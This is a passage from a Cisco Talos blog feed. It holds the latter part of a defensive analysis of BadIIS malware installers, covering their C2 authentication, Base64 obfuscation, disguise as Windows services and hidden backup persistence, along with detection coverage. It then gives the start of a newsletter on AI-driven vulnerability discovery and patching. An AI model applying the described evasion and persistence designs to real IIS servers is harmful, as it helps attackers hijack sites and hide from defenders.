https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/041326-Badlls-03.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/041326-Badlls-03.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/041326-Badlls-03.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;9.&#xA0;Workflow assessed for commodity&#xA0;BadIIS.</span></figcaption></figure><h2 id="additional-tools-developed-by-same-author">Additional&#xA0;tools developed by same author&#xA0;</h2><p>By pivoting on the previously&#xA0;identified&#xA0;PDB strings and the authentication mechanism,&#xA0;Talos&#xA0;discovered that this author has developed a suite of&#xA0;additional&#xA0;tools designed to&#xA0;facilitate&#xA0;the installation of&#xA0;BadIIS&#xA0;on target machines. The observed PDB strings are listed below, followed by a detailed analysis of the differences between these tools and their respective capabilities.</p><ul><li>D:\vc\dll&#x5C01;&#x88C5;&#x8FDB;exe\x64\Release\moduleinit.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;DLL</em>&#xA0;<em>packaged into EXE&#x201D;</em>)&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-28\install\x64\Release\install.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\install\x64\Release\install.pdb&#xA0;</li><li>C:\vc\service\Release\service.pdb&#xA0;</li><li>C:\vc\service\x64\Release\service.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\service\Release\service.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\bao\svchost\x64\Release\service.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-26\svchost\x64\Release\service.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\x&#x795E;&#x7684;&#x81EA;&#x5B89;&#x88C5;&#x670D;&#x52A1;\svchost\x64\Release\service.pdb<br>(<em>translation:</em>&#xA0;<em>&#x201C;xshen</em>&#xA0;<em>self-installation service&#x201D;</em>)</li></ul><h3 id="early-service%E2%80%91based-installer">Early service&#x2011;based installer&#xA0;</h3><p>Talos&#xA0;identified&#xA0;an&#xA0;additional&#xA0;tool that we&#xA0;assess with high&#xA0;confidence&#xA0;is linked to the same author. Upon execution, the tool verifies&#xA0;that&#xA0;it is running as a Windows service named&#xA0;&#x201C;Winlogin.&#x201D;&#xA0;If this condition is met, it&#xA0;initiates&#xA0;a two-stage C2 communication process. First, it connects to a primary C2 server for authentication. During this phase, the malware&#xA0;validates&#xA0;the connection by checking if the server&apos;s response matches the specific string &quot;lwxat&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig10.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="1056" height="346" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig10.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/fig10.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig10.png 1056w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;10.&#xA0;First C2 server for authentication.</span></figcaption></figure><p>Once authenticated, it connects to a secondary C2 server to download and execute&#xA0;additional&#xA0;malicious payloads on the target machine. Furthermore, the malware uses double Base64 encoding to obfuscate the addresses of both C2 servers.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig11.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="601" height="142" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig11.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig11.png 601w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;11.&#xA0;Second C2&#xA0;to&#xA0;download&#xA0;payload.</span></figcaption></figure><h3 id="configuration%E2%80%91driven-service-installer">Configuration&#x2011;driven service installer&#xA0;</h3><p>Talos observed another service-based tool that dynamically locates and reads an external configuration file to deploy BadIIS onto target machines. This component serves the same operational purpose as the installation batch scripts traditionally observed in <a href="https://blog.talosintelligence.com/dragon-rank-seo-poisoning/" rel="noreferrer">earlier BadIIS campaigns</a>. Upon execution, the malware identifies its own absolute path and searches its current directory for a file named &#x201C;config.txt&#x201D;. This configuration file uses an XML-like syntax, employing custom tags such as &#x201C;&lt;globalModules&gt;&#x201D;,&#xA0;&#x201C;&lt;name&gt;&#x201D;,&#xA0;&#x201C;&lt;path&gt;&#x201D;,&#xA0;and&#xA0;&#x201C;&lt;cmd&gt;&#x201D;. The tool employs a custom parsing routine to segment the file based on these tags, extracting string arrays that dictate its subsequent actions. Using this extracted data, the malware dynamically assembles command-line instructions by iterating through the parsed modules and replacing placeholders like &#x201C;{name}&#x201D; and &#x201C;{path}&#x201D; with randomized DLL paths and command snippets.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig12.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="658" height="838" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig12.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig12.png 658w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;12.&#xA0;Configuration&#xA0;tags.</span></figcaption></figure><p>During this assembly phase, the tool specifically prepares commands for both 32-bit and 64-bit BadIIS (e.g., appending &#x201C;32.dll&#x201D; /y and &#x201C;64.dll&#x201D; /y). These fully-formed commands are then executed, likely via cmd.exe /c, using a function designed to capture the command output.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig13.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="952" height="258" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig13.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig13.png 952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;13.&#xA0;Preparing&#xA0;commands for 32-bit&#xA0;BadIIS.</span></figcaption></figure><h3 id="authentication-and-configuration%E2%80%91driven-unified-tool">Authentication&#xA0;and&#xA0;configuration&#x2011;driven&#xA0;unified tool&#xA0;</h3><p>The threat actor continues to update this tool, recently merging two distinct capabilities into a single binary. The malware still impersonates the&#xA0;Winlogin&#xA0;system service for registration and persistence,&#xA0;but&#xA0;it now&#xA0;utilizes&#xA0;a higher volume of command-line executions to successfully install the&#xA0;BadIIS&#xA0;payload. Notably, these command lines closely resemble the syntax used in earlier&#xA0;BadIIS&#xA0;batch scripts. To evade detection by security products, the tool obfuscates its command lines and parameters using a custom Base64 encoding algorithm. A list of the encoded strings and their decoded counterparts is provided below.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/tables.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="1380" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/tables.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/tables.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/tables.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/tables.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><p>Based on&#xA0;the&#xA0;decoded&#xA0;strings and the&#xA0;tool&apos;s&#xA0;code&#xA0;structure, we can categorize the functionality&#xA0;of this upgraded&#xA0;tool&#xA0;into three primary&#xA0;areas.&#xA0;The&#xA0;first&#xA0;group&#xA0;of strings&#xA0;focuses on file discovery,&#xA0;searching for&#xA0;&#x201C;module.txt&#x201D;,&#xA0;&#x201C;<em>.dll&#x201D;,&#xA0;and&#xA0;&#x201C;</em>.config&#x201D;&#xA0;files. The&#xA0;&#x201C;<em>.config&#x201D;&#xA0;and&#xA0;&#x201C;</em>.dll&#x201D;&#xA0;searches serve the same purpose as in&#xA0;previous&#xA0;versions, targeting IIS configuration files and the&#xA0;BadIIS&#xA0;malware, respectively. The&#xA0;&#x201C;module.txt&#x201D;&#xA0;file&#xA0;likely acts&#xA0;as a staging file to temporarily store the IIS modules list before committing changes to the active configuration. Furthermore, this phase targets the&#xA0;&#x201C;&lt;globalModules&gt;&#x201D; and &#x201C;&lt;modules&gt;&#x201D; sections to register the malicious DLL at the server level. The second&#xA0;group&#xA0;handles payload registration; the tool&#xA0;utilizes&#xA0;specific XML nodes to inject its payloads into the IIS configuration, dynamically replacing placeholders (e.g., &#x201C;{name32}&#x201D; and &#x201C;{path64}&#x201D;) with actual values. Finally, the third&#xA0;group&#xA0;is responsible for&#xA0;locating&#xA0;the primary&#xA0;BadIIS&#xA0;DLL and&#xA0;establishing&#xA0;its backup location to ensure persistence.&#xA0;However, prior to executing its primary functions, the tool sends a request to the C2 server for&#xA0;authentication.&#xA0;The validation process&#xA0;remains&#xA0;identical to previous versions; the tool verifies the connection by checking if the&#xA0;server&apos;s&#xA0;response matches the specific string &quot;lwxat&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig14.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="345" height="162"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;14.&#xA0;Specific string &quot;lwxat&quot; for authentication.</span></figcaption></figure><h3 id="latest-two%E2%80%91stage-installation-toolset">Latest two&#x2011;stage installation toolset&#xA0;</h3><p>Talos observed that the latest version of the service installation tool is now separated into two distinct files. The workflow is shown&#xA0;in Figure 15.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/041326-Badlls-02.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="1211" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/041326-Badlls-02.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/041326-Badlls-02.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/041326-Badlls-02.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/041326-Badlls-02.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;15. Installation workflow.</span></figcaption></figure><p>The first file acts as the primary installer and begins by authenticating with the C2 server. Following successful authentication, it searches for the&#xA0;BadIIS&#xA0;malware, copies the payloads to specific primary and backup directories, and registers them within the IIS server module list to ensure persistence. Subsequently, it drops a secondary malware&#xA0;component, installing it as a Windows service. During our research, Talos observed this secondary malware impersonating legitimate services such as FaxService or AudiosService. Additionally, we recovered customization parameters and execution logs associated with this installer, which&#xA0;provided&#xA0;deeper insights into its overall capabilities.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig16.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="741" height="523" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig16.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig16.png 741w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;16.&#xA0;Customization parameters and execution&#xA0;logs&#xA0;file.</span></figcaption></figure><p>The commands and parameters embedded in the install are also encoded.&#xA0;Below&#xA0;is&#xA0;a list of the encoded strings and their decoded counterparts.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/tables2.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="2158" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/tables2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/tables2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/tables2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/tables2.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><p>The secondary malware component functions similarly to the previously described service tool. However, recognizing that security operations centers (SOCs) or antivirus products can easily quarantine or delete the primary BadIIS malware, the author has implemented a robust persistence mechanism. The installer now copies the BadIIS malware not only to the active directory used for hooking IIS requests and responses but also to a hidden backup location. This ensures that the malicious BadIIS is automatically restored and launched every time the compromised IIS server is restarted. The table below provides a list of the encoded strings and their decoded counterparts.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/tables3.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="1293" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/tables3.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/tables3.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/tables3.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/tables3.jpg 2400w" sizes="(min-width: 720px) 720px"></figure><h3 id="module-initialization-dropper">Module initialization dropper&#xA0;</h3><p>Alongside the service-based tools, Talos identified another utility that shares the same C2 authentication mechanism, custom Base64 encoding algorithm, and similar code structure. However, rather than&#xA0;operating&#xA0;as a persistent service, this tool functions primarily as a dropper designed to install the&#xA0;BadIIS&#xA0;malware onto the target IIS server. The embedded PDB string (&#x201C;D:\vc\dll&#x5C01;&#x88C5;&#x8FDB;exe\x64\Release\moduleinit.pdb&#x201D;,&#xA0;which translates to &quot;DLL packaged into EXE&quot;) explicitly confirms its purpose: packaging malicious DLL payloads within a standalone executable. The&#xA0;BadIIS&#xA0;are&#xA0;found&#xA0;in the resource and named&#xA0;as &#x201C;IIS32&#x201D; and &#x201C;IIS64&#x201D; (see Figure 17).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig17.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="859" height="244" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig17.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig17.png 859w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;17.&#xA0;BadIIS&#xA0;malware in the resource.</span></figcaption></figure><p>The drop location for this&#xA0;BadIIS&#xA0;malware is&#xA0;identical to the one used by the installation script&#xA0;previously documented by&#xA0;<a href="https://www.trendmicro.com/en_us/research/25/b/chinese-speaking-group-manipulates-seo-with-badiis.html" rel="noreferrer noopener"><u>Trend Micro</u></a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig18.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="665" height="849" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig18.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig18.png 665w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;18.&#xA0;BadIIS&#xA0;malware drop location.</span></figcaption></figure><h2 id="lwxat-badiis-author-identification">&quot;lwxat&quot;:&#xA0;BadIIS&#xA0;author&#xA0;identification&#xA0;</h2><p>Through&#xA0;detailed&#xA0;analysis of&#xA0;numerous&#xA0;BadIIS&#xA0;samples, associated tools, and builder artifacts,&#xA0;Talos&#xA0;assesses&#xA0;with moderate-to-high confidence that the string&#xA0;&quot;lwxat&quot;&#xA0;is&#xA0;the&#xA0;author&apos;s alias or handle. This assessment is based on the following converging evidence:&#xA0;</p><ul><li><strong>Builder</strong>&#xA0;<strong>authentication</strong>&#xA0;<strong>mechanism:</strong>&#xA0;The&#xA0;BadIIS&#xA0;builder and service tool uses the string&#xA0;&quot;lwxat&quot;&#xA0;as a hardcoded match string within its authentication routine,&#xA0;suggesting the author embedded their identity into the tool&apos;s access control logic.&#xA0;</li><li><strong>Configuration</strong>&#xA0;<strong>parameter:</strong>&#xA0;The string&#xA0;&quot;lwxat&quot;&#xA0;is used as the enable function parameter within the&#xA0;builder&apos;s&#xA0;&#x201C;config.txt&#x201D;&#xA0;file, further&#xA0;indicating&#xA0;authorship attribution embedded in the&#xA0;tool&apos;s&#xA0;operational configuration.&#xA0;</li><li><strong>User-agent signature: </strong>Most notably, several BadIIS malware samples were observed using &quot;lwxatisme&quot; as a custom user-agent string during HTTP communications &#x2014; a strong behavioral indicator that directly ties the malware to the &quot;lwxat&quot; persona.</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig19.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="566" height="155"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;19.&#xA0;The&#xA0;custom&#xA0;user-agent string &#x201C;lwxatisme&#x201D;.</span></figcaption></figure><p>Additionally, corroborating evidence was&#xA0;identified&#xA0;through&#xA0;PDB path strings&#xA0;found within certain samples. One PDB path&#xA0;contained&#xA0;the&#xA0;Chinese-language string:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig20-1.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="665" height="68" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig20-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig20-1.png 665w"></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig20-2.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="670" height="90" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig20-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig20-2.png 670w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;20.&#xA0;A folder for&#xA0;x&#x795E;&#x2019;s&#xA0;requirements.</span></figcaption></figure><p>This suggests that the author created a dedicated development folder for a user or client named&#xA0;&quot;xshen&quot; (x&#x795E;),&#xA0;indicating&#xA0;that this particular&#xA0;BadIIS&#xA0;variant was a&#xA0;customized build&#xA0;tailored specifically for&#xA0;&#x201C;xshen&apos;s&#x201D;requirements that a full-site traffic hijacking with redirection logic based on the victim&apos;s browser language settings.</p><p>Collectively, these findings presence of&#xA0;&quot;lwxat&quot;&#xA0;across the builder&apos;s authentication, configuration, and in-the-wild&#xA0;user-agent strings, combined with the PDB path referencing a customized build for&#xA0;&#x201C;xshen&#x201D;&#xA0;and provide converging evidence indicating that&#xA0;&quot;lwxat&quot;&#xA0;is the primary developer or operator behind the&#xA0;BadIIS&#xA0;malware family, potentially offering&#xA0;customization services&#xA0;to other threat actors.&#xA0;</p><h2 id="coverage">Coverage&#xA0;</h2><p>The following&#xA0;ClamAV&#xA0;signatures detect and block this threat:&#xA0;</p><ul><li>Win.Malware.BadIIS-10059971-0&#xA0;</li><li>Win.Malware.BadIIS-10059977-0&#xA0;</li><li>Win.Malware.BadIIS-10059984-0&#xA0;</li><li>Win.Malware.BadIIS-10059985-0</li></ul><p>The following SNORT&#xAE; rules (SIDs) detect and block this threat:&#xA0;&#xA0;</p><ul><li>Snort2: 1:66400, 1:66399, 1:66398&#xA0;</li><li>Snort3: 1:66400, 1:301491&#xA0;</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)&#xA0;</h2><p>The IOCs can also be found in our GitHub repository&#xA0;<a href="https://github.com/Cisco-Talos/IOCs/blob/main/2026/05/commodity_badiis.txt" rel="noreferrer">here</a>.</p>]]></content:encoded></item><item><title><![CDATA[The time of much patching is coming]]></title><description><![CDATA[In this week’s newsletter, Martin reflects on what the next iteration of AI tools means for vulnerability discovery and our ability to manage large-scale patch releases.]]></description><link>https://blog.talosintelligence.com/the-time-of-much-patching-is-coming/</link><guid isPermaLink="false">6a04c73c7666240001a20f39</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Martin Lee]]></dc:creator><pubDate>Thu, 14 May 2026 18:00:24 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source-1.jpg" alt="The time of much patching is coming"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>Many solutions have been proposed to reduce software bugs: zero-defect mandates, pair programming, formal methods,&#xA0;and mathematical software proofs. The reality is that software engineering is&#xA0;<em>hard</em>. Identifying and fixing bugs before they make it into production code is&#xA0;<em>hard</em>. Source code peer review and extensive unit testing have improved code quality, but bugs still get through.&#xA0;</p><p>Not every bug is a vulnerability, and not every fault that&#xA0;appears to be&#xA0;a vulnerability can be usefully exploited. Nevertheless, through extensive testing and review, a skilled vulnerability researcher can still uncover faults in software that has&#xA0;already undergone&#xA0;rigorous quality assurance. However, skilled vulnerability researchers are a scarce resource and can only review so much software.&#xA0;</p><p>AI is&#xA0;the&#xA0;great hope for improving software quality. Iterative improvements in&#xA0;AI&apos;s&#xA0;ability to find bugs mean that each&#xA0;new version&#xA0;of&#xA0;these&#xA0;systems is better than the&#xA0;last.&#xA0;We&#x2019;re&#xA0;now at the point where AI, although still not as good as a skilled vulnerability researcher, can scan code to find errors at a scale and speed that human analysis cannot match. Used well, it can&#xA0;identify&#xA0;potential vulnerabilities before they&#xA0;reach&#xA0;production.&#xA0;</p><p>In the long&#xA0;term, this is&#xA0;very good&#xA0;news. Better automated review and analysis of software is how we will improve code quality. However, in the short&#xA0;term, decades of technical debt and latent errors will be uncovered and will need to be&#xA0;addressed. To make things more complex, threat actors will have access to these same tools to search for exploitable vulnerabilities for their own ends.&#xA0;</p><p>The result is likely to be a surge in patches. More vulnerabilities discovered means more fixes released, placing additional pressure on already stretched operations teams. Many of these patches will be urgent; some will address vulnerabilities that are being actively exploited. Without proper planning, the volume of fixes may outpace an organization&apos;s capacity to deploy them.</p><p>The surge of patches has yet to happen, but the first signs may already be visible. Now is an excellent&#xA0;time to consider how&#xA0;you&#xA0;prioritise&#xA0;patching, apply patches at scale,&#xA0;and manage systems that cannot be patched quickly&#xA0;&#x2014;&#xA0;or&#xA0;at all. We can reflect on these questions now, and improve our processes, or we can flounder when the surge of patches arrives. Either way, ready or not, the time of much patching is coming.&#xA0;</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>In Cisco Talos&#x2019;&#xA0;<a href="https://blog.talosintelligence.com/state-sponsored-actors-better-known-as-the-friends-you-dont-want/" rel="noreferrer noopener"><u>latest blog</u></a>, we outline the differences between responding to state-sponsored threat actors and handling commodity ransomware. These advanced adversaries&#xA0;log&#xA0;in using valid credentials and leverage your own trusted tools to remain invisible for months. Because their primary&#xA0;objectives&#xA0;are long-term espionage and pre-positioning rather than immediate financial gain, standard incident response playbooks are entirely inadequate.&#xA0;&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>State-sponsored actors operate inside your trust boundary and aim to remain completely undetected. They have the patience and resources to map your infrastructure, exploit supply chain vulnerabilities, and blend their lateral movement into routine administrative tasks. If your security architecture assumes internal traffic is inherently trustworthy, these adversaries will exploit that gap to establish deep, persistent access across both IT and operational technology environments. Prematurely containing these threats can even tip off the attacker, causing you to lose critical intelligence and the chance to fully eradicate their foothold.</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Shift to a&#xA0;zero trust&#xA0;architecture that continuously verifies access and plans for inevitable failures, starting with&#xA0;maximizing your visibility through centralized log aggregation and enabling Windows command-line and PowerShell script block logging. Prioritize identity management by enforcing multi-factor authentication on all administrative accounts and implementing a tiered access model. Update your incident response playbooks to specifically address living-off-the-land techniques, supply chain compromises, and the complex operational timing&#xA0;required&#xA0;for state-sponsored containment.&#xA0;<a href="https://blog.talosintelligence.com/state-sponsored-actors-better-known-as-the-friends-you-dont-want/" rel="noreferrer noopener"><u>Read the blog here for more information.</u></a>&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Linux bitten by second severe vulnerability in as many weeks</strong>&#xA0;<br>The leaked exploit is deterministic, meaning it works precisely the same way each time&#xA0;it&#x2019;s&#xA0;run and across different Linux distributions. It causes no crashes, making it stealthy to run. Install patches&#xA0;immediately. (<a href="https://arstechnica.com/security/2026/05/linux-bitten-by-second-severe-vulnerability-in-as-many-weeks/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>Ars Technica</u></a>)&#xA0;</p><p><strong>A DOD contractor&#x2019;s API flaw exposed military course data and service member records</strong>&#xA0;<br>The issue affected Schemata, an AI-powered virtual training platform used in military and defense settings.&#xA0;According to Strix, an ordinary low-privilege account was able to access data across multiple tenants.&#xA0;(<a href="https://cyberscoop.com/schemata-dod-contractor-api-flaw-military-data-exposure/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>CyberScoop</u></a>)&#xA0;</p><p><strong>Fake OpenAI Privacy Filter repo hits No. 1 on Hugging Face, draws 244K downloads</strong>&#xA0;<br>A malicious repository managed to take a spot in the platform&apos;s trending list by impersonating OpenAI&apos;s Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users. (<a href="https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>TanStack, Mistral AI, UiPath hit in fresh supply chain attack</strong>&#xA0;<br>The same as in&#xA0;previous&#xA0;campaigns, the worm targets sensitive information, including developer credentials, API keys, tokens, cloud credentials and secrets, cryptocurrency wallets, and more. (<a href="https://www.securityweek.com/tanstack-mistral-ai-uipath-hit-in-fresh-supply-chain-attack/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Official CheckMarx Jenkins package compromised with infostealer</strong>&#xA0;<br>Checkmarx warned over the weekend that a rogue version of its Jenkins Application Security Testing (AST) plugin had been published on the Jenkins Marketplace. (<a 